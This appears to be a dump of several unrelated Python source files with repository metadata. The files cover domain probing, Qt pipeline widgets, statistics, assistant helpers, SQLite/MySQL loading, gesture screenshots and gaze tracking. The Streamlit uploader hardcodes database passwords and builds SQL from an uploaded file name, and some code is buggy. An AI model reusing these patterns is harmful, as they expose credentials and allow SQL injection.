"line_number": 23,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_n... |
71648693307 | #!/usr/bin/env python3
import asyncio
import socket
from keyword import kwlist
from typing import Tuple as tuple
MAX_KEYWORD_LEN = 4 # <1>
async def probe(domain: str) -> tuple[str, bool]: # <2>
loop = asyncio.get_running_loop() # <3>
try:
await loop.getaddrinfo(domain, None) # <4>
except socket.gaierror:
return (domain, False)
return (domain, True)
async def main() -> None: # <5>
names = (kw for kw in kwlist if len(kw) <= MAX_KEYWORD_LEN) # <6>
domains = (f'{name}.dev'.lower() for name in names) # <7>
coros = [probe(domain) for domain in domains] # <8>
for coro in asyncio.as_completed(coros): # <9>
# 这里coro已经是完成的了,为什么还要await,去掉会报错的,可能是解包相关的问题。
# 原文解释:the await expression will not block but we need it to get the
# result from coro. If coro raised an unhandled exception,
# it would be re-raised
# here.
domain, found = await coro # <10>
mark = '+' if found else ' '
print(f'{mark} {domain}')
if __name__ == '__main__':
asyncio.run(main()) # <11>
| yangguang8112/fluentPy | new_chapter18/21-async/domains/asyncio/blogdom.py | blogdom.py | py | 1,205 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "asyncio.get_running_loop",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "socket.gaierror",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "typing.Tuple",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "keyword.kw... |
38931021069 | from typing import Callable
from PySide2.QtWidgets import QListWidget, QAbstractItemView, QAction, QPushButton, QListWidgetItem, QGridLayout
from PySide2.QtCore import QSize, QThread, Signal, Slot, Qt
import damaker
from damaker.pipeline import *
import damaker_gui
import damaker_gui.widgets as widgets
class PipelineWidget(QListWidget, widgets.ITabWidget):
name: str = "Pipeline"
icon: str = u":/flat-icons/icons/flat-icons/timeline.svg"
def __init__(self, parent=None, operations=[]):
super().__init__(parent)
self.setSpacing(3)
self.setDragDropMode(QAbstractItemView.InternalMove)
self.setVerticalScrollMode(QListWidget.ScrollMode.ScrollPerPixel)
self.setContextMenuPolicy(Qt.ActionsContextMenu)
act = QAction("Remove", self)
act.triggered.connect(self.removeOperation)
self.addAction(act)
for op in operations:
self.addOperation(op)
self.pipelineThread = PipelineRunnerThread()
def tabEnterFocus(self):
damaker_gui.MainWindow.Instance.operationList.connectPipeline(self)
def tabExitFocus(self):
damaker_gui.MainWindow.Instance.operationList.disconnectPipeline(self)
def runPipeline(self):
self.pipelineThread.setPipeline(self)
self.pipelineThread.stopped.connect(self.stopPipeline)
self.pipelineThread.start()
# self.pipelineThread.run()
def stopPipeline(self):
self.pipelineThread.terminate()
print("(Pipeline ended 🟡)")
def addOperation(self, op: Operation):
print(f"Operation '{op.name}' added ✔")
item = QListWidgetItem(op.name)
item.op = op.copy()
self.addItem(item)
# op_widget = widgets.OperationWidget(op=op, pipeline=self, layoutType=QGridLayout, batchMode=True)
# item.setSizeHint(QSize(op_widget.width(), op_widget.height()))
def addOpfromFunc(self, func: Callable):
self.addOperation(Operation(func, [], func.__name__))
def removeOperation(self):
self.takeItem(self.currentRow())
class PipelineRunnerThread(QThread):
stopped = Signal()
def __init__(self, pipeline: PipelineWidget=None):
super(PipelineRunnerThread, self).__init__()
self.pipeline = pipeline
def setPipeline(self, pipeline: PipelineWidget):
self.pipeline = pipeline
@Slot()
def run(self):
if self.pipeline is None:
pass
self.setPriority(QThread.HighPriority)
operations: list[widgets.OperationWidget] = []
for i in range(self.pipeline.count()):
# operations.append(self.pipeline.itemWidget(self.pipeline.item(i)))
operations.append(self.pipeline.item(i).op)
print("[Starting Pipeline 🚀]")
step = 1
for op in operations:
if not op.enabled:
continue
print(f'-- [{step}] âž¡ {op.name} --')
op.run()
step += 1
print("[Pipeline finished 🟢]")
self.stopped.emit()
| subski/DAMAKER | damaker_gui/widgets/PipelineWidget.py | PipelineWidget.py | py | 3,049 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "PySide2.QtWidgets.QListWidget",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "damaker_gui.widgets.ITabWidget",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "damaker_gui.widgets",
"line_number": 11,
"usage_type": "name"
},
{
... |
1140042349 | import compcore
from joblib import Parallel, delayed
import multiprocessing
import numpy as np
import scipy as sp
import h5py
import sys, csv, re, os, time, argparse, string, tempfile
try:
import lsalib
except ImportError:
from lsa import lsalib
def main():
parser = argparse.ArgumentParser()
arg_precision_default=1000
arg_delayLimit_default=0
parser.add_argument("dataFile", metavar="dataFile", type=argparse.FileType('r'), \
help="the input data file,\n \
m by (r * s)tab delimited text; top left cell start with \
'#' to mark this is the header line; \n \
m is number of variables, r is number of replicates, \
s it number of time spots; \n \
first row: #header s1r1 s1r2 s2r1 s2r2; \
second row: x ?.?? ?.?? ?.?? ?.??; for a 1 by (2*2) data")
parser.add_argument("resultFile", metavar="resultFile", type=argparse.FileType('w'), \
help="the output result file")
parser.add_argument("-e", "--extraFile", dest="extraFile", default=None, \
type=argparse.FileType('r'),
help="specify an extra datafile, otherwise the first datafile will be used \n \
and only lower triangle entries of pairwise matrix will be computed")
parser.add_argument("-d", "--delayLimit", dest="delayLimit", default=arg_delayLimit_default, type=int,\
help="specify the maximum delay possible, default: {},\n \
must be an integer >=0 and <spotNum".format(arg_delayLimit_default))
parser.add_argument("-m", "--minOccur", dest="minOccur", default=50, type=int,
help="specify the minimum occurence percentile of all times, default: 50,\n")
parser.add_argument("-r", "--repNum", dest="repNum", default=1, type=int,
help="specify the number of replicates each time spot, default: 1,\n \
must be provided and valid. ")
parser.add_argument("-s", "--spotNum", dest="spotNum", default=4, type=int,
help="specify the number of time spots, default: 4,\n \
must be provided and valid. ")
parser.add_argument("-p", "--pvalueMethod", dest="pvalueMethod", default="perm", \
choices=["perm", "theo", "mix"],
help="specify the method for p-value estimation, \n \
default: pvalueMethod=perm, i.e. use permutation \n \
theo: theoretical approximaton; if used also set -a value. \n \
mix: use theoretical approximation for pre-screening \
if promising (<0.05) then use permutation. ")
parser.add_argument("-x", "--precision", dest="precision", default=arg_precision_default, type=int,\
help="permutation/precision, specify the permutation \n \
number or precision=1/permutation for p-value estimation. \n \
default is {}, must be an integer >0 ".format(arg_precision_default) )
parser.add_argument("-b", "--bootNum", dest="bootNum", default=0, type=int, \
choices=[0, 100, 200, 500, 1000, 2000],
help="specify the number of bootstraps for 95%% confidence \
interval estimation, default: 100,\n \
choices: 0, 100, 200, 500, 1000, 2000. \n \
Setting bootNum=0 avoids bootstrap. \n \
Bootstrap is not suitable for non-replicated data.")
parser.add_argument("-t", "--transFunc", dest="transFunc", default='simple', \
choices=['simple', 'SD', 'Med', 'MAD'],\
help="specify the method to summarize replicates data, default: simple, \n \
choices: simple, SD, Med, MAD \n \
NOTE: \n \
simple: simple averaging \n \
SD: standard deviation weighted averaging \n \
Med: simple Median \n \
MAD: median absolute deviation weighted median;" )
parser.add_argument("-f", "--fillMethod", dest="fillMethod", default='none', \
choices=['none', 'zero', 'linear', 'quadratic', 'cubic', 'slinear', 'nearest'], \
help="specify the method to fill missing, default: none, \n \
choices: none, zero, linear, quadratic, cubic, slinear, nearest \n \
operation AFTER normalization: \n \
none: fill up with zeros ; \n \
operation BEFORE normalization: \n \
zero: fill up with zero order splines; \n \
linear: fill up with linear splines; \n \
slinear: fill up with slinear; \n \
quadratic: fill up with quadratic spline; \n \
cubic: fill up with cubic spline; \n \
nearest: fill up with nearest neighbor")
parser.add_argument("-n", "--normMethod", dest="normMethod", default='robustZ', \
choices=['percentile', 'percentileZ', 'pnz', 'robustZ', 'rnz', 'none'], \
help="must specify the method to normalize data, default: robustZ, \n \
choices: percentile, none, pnz, percentileZ, robustZ or a float \n \
NOTE: \n \
percentile: percentile normalization, including zeros (only with perm)\n \
pnz: percentile normalization, excluding zeros (only with perm) \n \
percentileZ: percentile normalization + Z-normalization \n \
rnz: percentileZ normalization + excluding zeros + robust estimates (theo, mix, perm OK) \n \
robustZ: percentileZ normalization + robust estimates \n \
(with perm, mix and theo, and must use this for theo and mix, default) \n")
parser.add_argument("-q", "--qvalueMethod", dest="qvalueMethod", \
default='scipy', choices=['scipy'],
help="specify the qvalue calculation method, \n \
scipy: use scipy and storeyQvalue function, default \n \
")
#R: use R's qvalue package, require X connection")
parser.add_argument("-T", "--trendThresh", dest="trendThresh", default=None, \
type=float, \
help="if trend series based analysis is desired, use this option \n \
NOTE: when this is used, must also supply reasonble \n \
values for -p, -a, -n options")
parser.add_argument("-a", "--approxVar", dest="approxVar", default=1, type=float,\
help="if use -p theo and -T, must set this value appropriately, \n \
precalculated -a {1.25, 0.93, 0.56,0.13 } for i.i.d. standard normal null \n \
and -T {0, 0.5, 1, 2} respectively. For other distribution \n \
and -T values, see FAQ and Xia et al. 2013 in reference")
parser.add_argument("-v", "--progressive", dest="progressive", default=0, type=int,
help="specify the number of progressive output to save memory, default: 0,\n \
2G memory is required for 1M pairwise comparison. ")
arg_namespace = parser.parse_args()
fillMethod = vars(arg_namespace)['fillMethod']
normMethod = vars(arg_namespace)['normMethod']
qvalueMethod = vars(arg_namespace)['qvalueMethod']
pvalueMethod = vars(arg_namespace)['pvalueMethod']
precision = vars(arg_namespace)['precision']
transFunc = vars(arg_namespace)['transFunc']
bootNum = vars(arg_namespace)['bootNum']
approxVar = vars(arg_namespace)['approxVar']
trendThresh = vars(arg_namespace)['trendThresh']
progressive = vars(arg_namespace)['progressive']
delayLimit = vars(arg_namespace)['delayLimit']
minOccur = vars(arg_namespace)['minOccur']
dataFile = vars(arg_namespace)['dataFile'] #dataFile
extraFile = vars(arg_namespace)['extraFile'] #extraFile
resultFile = vars(arg_namespace)['resultFile'] #resultFile
repNum = vars(arg_namespace)['repNum']
spotNum = vars(arg_namespace)['spotNum']
try:
extraFile_name = extraFile.name
except AttributeError:
extraFile_name = ''
assert trendThresh==None or trendThresh>=0
if transFunc == 'SD':
fTransform = lsalib.sdAverage
elif transFunc == 'Med':
fTransform = lsalib.simpleMedian
elif transFunc == 'MAD':
fTransform = lsalib.madMedian
else:
fTransform = lsalib.simpleAverage
if repNum < 5 and transFunc == 'SD':
print("Not enough replicates for SD-weighted averaging, fall back to simpleAverage", file=sys.stderr)
transFunc = 'simple'
if repNum < 5 and transFunc == 'MAD':
print("Not enough replicates for Median Absolute Deviation, fall back to simpleMedian", file=sys.stderr)
transFunc = 'Med'
if normMethod == 'none':
zNormalize = lsalib.noneNormalize
elif normMethod == 'percentile':
zNormalize = lsalib.percentileNormalize
elif normMethod == 'percentileZ':
zNormalize = lsalib.percentileZNormalize
elif normMethod == 'robustZ':
zNormalize = lsalib.robustZNormalize
elif normMethod == 'pnz':
zNormalize = lsalib.noZeroNormalize
elif normMethod == 'rnz':
zNormalize = lsalib.robustNoZeroNormalize
else:
zNormalize = lsalib.percentileZNormalize
start_time = time.time()
col = spotNum
total_row_0 = 0
total_row_1 = 0
block = 2000
first_file = "first_file.txt"
second_file = "second_file.txt"
with open(first_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_0 += 1
with open(second_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_1 += 1
i_m = 0
j_m = 0
start_0 = 1
end_0 = block
start_1 = 1
end_1 = block
if end_0 >= total_row_0:
end_0 = total_row_0
if end_1 >= total_row_1:
end_1 = total_row_1
manager = multiprocessing.Manager()
first_Data = manager.list()
second_Data = manager.list()
while i_m * block < total_row_0:
i_m += 1
skip_header = start_0
skip_footer = total_row_0 - end_0
firstData = np.genfromtxt(first_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(firstData.shape) == 1:
data = np.array([firstData])
firstFactorLabels = np.genfromtxt(first_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(firstFactorLabels)==str:
firstFactorLabels=[firstFactorLabels]
factorNum = firstData.shape[0]
tempData=np.zeros( ( factorNum, repNum, spotNum), dtype='float' )
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = firstData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
first_Data.append(tempData)
while j_m * block < total_row_1:
j_m += 1
skip_header = start_1
skip_footer = total_row_1 - end_1
secondData = np.genfromtxt(second_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(secondData.shape) == 1:
data = np.array([secondData])
secondFactorLabels=np.genfromtxt( second_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(secondFactorLabels)==str:
secondFactorLabels=[secondFactorLabels]
factorNum = secondData.shape[0]
tempData=np.zeros((factorNum,repNum,spotNum),dtype='float')
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = secondData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
second_Data.append(tempData)
merged_filename = 'merged_data_1.h5'
def myfun_pall(i):
data = compcore.LSA(total_row_0, total_row_1)
for j in range(0, len(second_Data)):
array = lsalib.palla_applyAnalysis( first_Data[i], second_Data[j], data, col, onDiag=True, delayLimit=delayLimit,bootNum=bootNum, pvalueMethod=pvalueMethod,
precisionP=precision, fTransform=fTransform, zNormalize=zNormalize, approxVar=approxVar, resultFile=resultFile, trendThresh=trendThresh,
firstFactorLabels=firstFactorLabels, secondFactorLabels=secondFactorLabels, qvalueMethod=qvalueMethod, progressive=progressive)
with h5py.File(merged_filename, 'w') as merged_hf:
merged_hf.create_dataset(f'data_{i}_{j}', data=array)
return 1
pool = multiprocessing.Pool(processes=10)
results = [pool.apply_async(myfun_pall, args=(process_id,)) for process_id in range(len(second_Data))]
for result in results:
a = result.get()
# parallel_obj = Parallel(n_jobs= -1)
# parallel_obj(delayed(myfun_pall)(i) for i in range(0, len(first_Data)))
print("finishing up...", file=sys.stderr)
end_time=time.time()
print("time elapsed %f seconds" % (end_time - start_time), file=sys.stderr)
if __name__=="__main__":
main()
| foolstars/a_elsa | elsa/lsa/ppi.py | ppi.py | py | 14,310 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "argparse.... |
34357687621 | import argparse, subprocess, socket, json, io, os, notify2
verbose = False
def get_metadata_id_from(meta): # meta is a user/application definable metapackage
data = call_application(meta) # application meta will create a timestamp entry of the relavent metadata, and then pass back the id number to log in the database
id = data.decode('utf-8')
return id
def user_notify(message): # message string, not message like the protocol
notify2.init('Assistant')
n = notify2.Notification("Notification",
message,
"notification-message-im" # Icon name
)
n.show()
def call_database(flags): # is this too specific to sql? it could be an important distinction for de/serial purpose
# the naming scheme needs to be formalized
COMMAND = os.getenv("ASST_COMMAND")
database = os.getenv("ASST_DATABASE") # the location of the database module
# this is just a stop gap for now. Everything needs to be cleaned up
if COMMAND == None:
COMMAND = "python3"
if database == None:
database = "sqldatabase.py"
command = [COMMAND,database]
for item in flags:
command.append(item)
notify(command)
process = subprocess.run(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE) # the returned value
if process.returncode is not 0: # this should return the serialized data
notify("The following command returned a non-zero code: %s"%(command))
notify("RETURN CODE: %d"%(process.returncode))
notify("STDERR: %s"%(process.stderr))
data = process.stdout
return data # it is returned, since selflib is a part of the calling program, not called over command line.
def call_application(flags): # this can be put into call_database, but I don't need it to call env variables again. is this bad?
COMMAND = os.getenv("ASST_COMMAND")
database = os.getenv("ASST_DATABASE")
notify("COMMAND: %s"%(COMMAND))
notify("DATABASE: %s"%(database))
notify("call_application called. calling %s"%(flags))
command = [COMMAND]
for item in flags:
command.append(item)
process = subprocess.run(command,stdout=subprocess.PIPE)
data = process.stdout # Don't decode. This could allow for binary responses with graphics, etc
return data # this data is returned, since this is a library called within an application. should have a unxi sample program built in
def message_server(data): # isn't this exactly what I am looking to do w/ call_application?
# Send the information to the server
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(data + "\n", "utf-8"), ("localhost", 9999))
def notify(string):
if verbose == True:
print(string)
def loud_notify(tag, string):
if verbose == True:
print("---START "+tag+"---")
print(string)
print("---END "+tag+"---")
def serialize(message):
data = json.dumps(message)
return data
def deserialize(data):
message = json.loads(data)
return message
def read_config_file():
print("This feature is not yet setup")
# run a core associated component. deserialize so it can be networked.
def run_with_return(command): # commands structure is a list. ["python3","program.py","-s","someinput"] broken up into atoms, rather than a long string. It could just be "python3 program.py -s someinput"] though...
loud_notify("Running Component", command)
pipe = pipes.Template()
f = pipe.open('pipefile','w')
subprocess.run(command, stdout=f)
f.close()
f = pipe.open('pipefile','r')
string = f.read()
return(deserialize(string))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="main udp server and router")
parser.add_argument('-v', dest='verbose', help="print verbose output", action='store_true')
parser.add_argument('-d', dest='deserialize', help="deserialize string input")
parser.add_argument('-s', dest='serialize', help="deserialize string input")
args = parser.parse_args()
if args.verbose is True:
verbose = True
if args.deserialize is not None:
deserialize(args.deserialize)
if args.serialize is not None:
serialize(args.serialize)
| Tadashi-Hikari/Sapphire-Assistant-Framework-Python | assistant/selflib.py | selflib.py | py | 4,305 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "notify2.init",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "notify2.Notification",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_num... |
19432133852 | import sqlite3
import os
lat = list()
with open('latitude.dat', 'r') as lats:
lat = lats.read().split('\n')
with open('longitude.dat', 'r') as lons:
lon = lons.read().split('\n')
with open('dates.dat', 'r') as dates:
tmp = [i[1:-1] for i in dates.read().split('\n')]
base = os.path.abspath(os.path.join('.', os.pardir))
conn = sqlite3.connect(base+'/firstsite/finder/static/finder/log.sqlite3')
cc = conn.cursor()
cc.execute('''CREATE TABLE IF NOT EXISTS log
(ID INTEGER PRIMARY KEY, IP TEXT, puerto TEXT, latitud TEXT, longitud TEXT, tiempo TEXT)''')
conn.commit()
for i in range(0, len(lat)):
sent_data = ('9000', '192.168.1.1', lat[i], lon[i], tmp[i])
cc.execute('''INSERT INTO log VALUES(NULL,?,?,?,?,?)''', sent_data)
conn.commit()
| juliansibaja84/GPStracking | lib/data_parser.py | data_parser.py | py | 784 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "os.path.abspath",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.pardir",
"line_numbe... |
22290767213 | # -*- coding: utf-8 -*-
import streamlit as st
from st_aggrid import AgGrid
import pandas as pd
import pymysql
from sqlalchemy import create_engine
engine = create_engine('mysql+pymysql://root:chiangcw@localhost/python?charset=utf8')
uploaded_file = st.file_uploader("请选择要上传的csv格式表格!")
if uploaded_file is not None:
df1 = pd.read_csv(uploaded_file)
AgGrid(df1)
df1.to_sql(name=str(uploaded_file.name).replace(".csv",""), con=engine, chunksize=1000, if_exists='replace', index=None)
st.success("上传成功!")
db = pymysql.connect(host="localhost", user="root", password="abcde", database="python", charset="utf8")
sql="select * from "+str(uploaded_file.name).replace(".csv","")
cursor = db.cursor()
cursor.execute(sql)
db.commit()
df2=pd.read_sql(sql,con=db)
st.success("数据库中的表格内容如下")
st.dataframe(df2)
else:
st.warning("请上传表格!") | chiangcw0410/mysql_test | test/test.py | test.py | py | 904 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "streamlit.file_uploader",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "st_agg... |
74923077307 | import numpy as np
import pyautogui
import time
import imutils
import cv2
import mediapipe as mp
from pynput.keyboard import Key, Controller
keyboard = Controller()
mp_hands = mp.solutions.hands
hands = mp_hands.Hands()
mp_draw = mp.solutions.drawing_utils
cap = cv2.VideoCapture(0)
finger_tips = [8, 12, 16, 20]
thumb_tip = 4
thumb_status = False
def draw_circle(tip, lm_list, state=False):
x, y = int(lm_list[tip].x * w), int(lm_list[tip].y * h)
if state == True:
cv2.circle(img, (x, y), 15, (255, 0, 0), cv2.FILLED)
elif state == False:
cv2.circle(img, (x, y), 15, (0, 255, 0), cv2.FILLED)
def finger_count(lm_list):
global finger_tips
finger_fold_status = []
for tip in finger_tips:
# getting the landmark tip position and drawing blue circle
# writing condition to check if finger is folded i.e checking if finger tip starting value is smaller than finger starting position which is inner landmark. for index finger
# if finger folded changing color to green
state = lm_list[tip - 3].y < lm_list[tip].y
draw_circle(tip, lm_list, state=state)
if state:
finger_fold_status.append(True)
else:
finger_fold_status.append(False)
return finger_fold_status
def screenshot():
image = pyautogui.screenshot("screenshot.png")
time.sleep(0.5)
def readimg(name):
img = cv2.imread(name)
cv2.imshow("screenshot", imutils.resize(img, width=600))
def trigger_sign(finger_status):
# check if the correct sign is done
# put ring finger down to take screenshot
if finger_status == [False, False, True, False]:
print("ss ") # take screenshot
screenshot()
readimg("screenshot.png")
while True:
ret, img = cap.read()
img = cv2.flip(img, 1)
h, w, c = img.shape
results = hands.process(img)
if results.multi_hand_landmarks:
for hand_landmark in results.multi_hand_landmarks:
# accessing the landmarks by their position
lm_list = []
for id, lm in enumerate(hand_landmark.landmark):
lm_list.append(lm)
# array to hold true or false if finger is folded
# checking if all fingers are folded
finger_fold_status = finger_count(lm_list)
trigger_sign(finger_fold_status)
print(finger_fold_status)
mp_draw.draw_landmarks(
img,
hand_landmark,
mp_hands.HAND_CONNECTIONS,
mp_draw.DrawingSpec((0, 0, 255), 2, 2),
mp_draw.DrawingSpec((0, 255, 0), 4, 2),
)
cv2.imshow("hand tracking", img)
key = cv2.waitKey(1)
if key == 32:
break
cv2.destroyAllWindows()
| diganta121/PRO-C109 | take_screenshot.py | take_screenshot.py | py | 2,789 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pynput.keyboard.Controller",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "mediapipe.solutions",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "mediapipe.solutions",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_... |
5125390370 | """
Demonstration of the GazeTracking library.
Check the README.md for complete documentation.
"""
import time
import threading
import cv2
import numpy as np
from gaze_tracking import GazeTracking
import sys
from PyQt5 import QtCore
from PyQt5.QtCore import QCoreApplication
from PyQt5.QtGui import QImage, QPixmap, QCloseEvent
from PyQt5.QtWidgets import QApplication, QStackedWidget
from GUImain.GUIframe import MyApp
import keyboard
import keyboard_event as event
import database_func as db
end_sig = False
img_num = 0
esc = False
webcam = cv2.VideoCapture(0)
R_top = 0
L_top = 0
C_top = 0
R_bottom = 0
L_bottom = 0
C_bottom = 0
avg_top_right = 0
avg_top_left = 0
avg_bottom_right = 0
avg_bottom_left = 0
avg_top_center = 0
avg_bottom_center = 0
total_left_hor_gaze = 0
total_right_hor_gaze = 0
total_top_ver_gaze = 0
total_bottom_ver_gaze = 0
sectionA =0
sectionB =0
sectionC =0
sectionD =0
sectionE =0
sectionF =0
section = "None"
count = 1
test_count = 1
flag = 0
gaze = GazeTracking()
#GUI
app = QApplication(sys.argv)
gui = MyApp()
gui.Stack.setCurrentWidget(gui.stack1)
gui.currentStack = 1
gui.name_btn.clicked.connect(gui.change_display)
def Section(where):
global sectionA, sectionB, sectionC, sectionD, sectionE, sectionF
if where == "A":
sectionA += 1
return sectionA
elif where == "B":
sectionB += 1
return sectionB
elif where == "C":
sectionC += 1
return sectionC
elif where == "D":
sectionD += 1
return sectionD
elif where == "E":
sectionE += 1
return sectionE
elif where == "F":
sectionF += 1
return sectionF
def Thread_run():
print(section, ":", Section(section))
thread = threading.Timer(1, Thread_run)
thread.daemon = True
thread.start()
return thread
thread = Thread_run()
while True:
#GUI
if gui.quit_sig:
sys.exit()
if bool(gui.start_btn.isChecked()):
# We get a new frame from the webcam
_, frame = webcam.read()
new_frame = np.zeros((500, 500, 3), np.uint8)
gaze.refresh(frame)
frame, loc1, loc2 = gaze.annotated_frame()
text = ""
'''
#draw face guide line
red_color = (0, 0, 255)
guide_x1 = 150
guide_y1 = 100
guide_w = 300
guide_h = 300
face_line = cv2.rectangle(frame, (guide_x1, guide_y1), (guide_x1 + guide_w, guide_y1 + guide_h), red_color, 3)
'''
#GUI
#if bool(gui.start_btn.isChecked()):
if test_count < 50:
cv2.circle(frame, (25, 25), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_left_hor_gaze += gaze.horizontal_ratio()
total_top_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio1:", gaze.horizontal_ratio())
print("ver ratio1:", gaze.vertical_ratio())
elif 50 <= test_count < 100:
cv2.circle(frame, (610, 25), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_right_hor_gaze += gaze.horizontal_ratio()
total_top_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio2:", gaze.horizontal_ratio())
print("ver ratio2:", gaze.vertical_ratio())
elif 100 <= test_count < 150:
cv2.circle(frame, (25, 450), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_left_hor_gaze += gaze.horizontal_ratio()
total_bottom_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio3:", gaze.horizontal_ratio())
print("ver ratio3:", gaze.vertical_ratio())
elif 150 <= test_count < 200:
cv2.circle(frame, (610, 450), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_right_hor_gaze += gaze.horizontal_ratio()
total_bottom_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio4:", gaze.horizontal_ratio())
print("ver ratio4:", gaze.vertical_ratio())
gaze_time = int(time.time())
save_loc1 = loc1
save_loc2 = loc2
else:
if flag == 0:
avg_left_hor_gaze = total_left_hor_gaze / 100
avg_right_hor_gaze = total_right_hor_gaze / 100
avg_top_ver_gaze = total_top_ver_gaze / 100
avg_bottom_ver_gaze = total_bottom_ver_gaze / 100
print(avg_left_hor_gaze, avg_right_hor_gaze, avg_top_ver_gaze, avg_bottom_ver_gaze)
flag = 1
if gaze.is_blinking():
text = "Blinking"
if gaze.is_top_right(avg_right_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (0, 200, 227)
text = "Looking top right"
section = "A"
elif gaze.is_top_left(avg_left_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (0, 0, 255)
text = "Looking top left"
section = "B"
elif gaze.is_bottom_right(avg_right_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (255, 0, 170)
text = "Looking bottom right"
section = "C"
elif gaze.is_bottom_left(avg_left_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (0, 255, 0)
text = "Looking bottom left"
section = "D"
elif gaze.is_top_center(avg_top_ver_gaze, avg_right_hor_gaze, avg_left_hor_gaze):
new_frame[:] = (0, 104, 250)
text = "Looking top center"
section = "E"
elif gaze.is_bottom_center(avg_top_ver_gaze, avg_right_hor_gaze, avg_left_hor_gaze):
new_frame[:] = (255, 0, 0)
text = "Looking bottom center"
section = "F"
cv2.putText(frame, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
left_pupil = gaze.pupil_left_coords()
right_pupil = gaze.pupil_right_coords()
cv2.putText(frame, "Left pupil: " + str(left_pupil), (90, 130), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.putText(frame, "Right pupil: " + str(right_pupil), (90, 165), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.rectangle(frame, save_loc1, save_loc2, (0, 0, 255), 2)
if test_count < 200:
cv2.namedWindow("Frame", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("Frame", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
#cv2.imshow("New Frame", new_frame)
cv2.imshow("Frame", frame)
else:
cv2.destroyAllWindows()
#database
if keyboard.is_pressed('down') or keyboard.is_pressed('up'):
gaze_time = int(time.time()) - gaze_time
img_num = img_num + 1
gaze_info = [gui.name, img_num, sectionA, sectionB, sectionC, sectionD, sectionE, sectionF, gaze_time]
end_sig = event.tracking_con(gaze_info)
sectionA = 0
sectionB = 0
sectionC = 0
sectionD = 0
sectionE = 0
sectionF = 0
gaze_time = time.time()
elif keyboard.is_pressed('esc'):
print('esc press')
gaze_time = int(time.time()) - gaze_time
img_num = img_num + 1
gaze_info = [gui.name, img_num, sectionA, sectionB, sectionC, sectionD, sectionE, sectionF, gaze_time]
esc = event.tracking_end(gaze_info)
# GUI
gui.start = True
qformat = QImage.Format_Indexed8
if len(frame.shape) == 3:
if frame.shape[2] == 4: # RGBA
qformat = QImage.Format_RGBA8888
else: # RGB
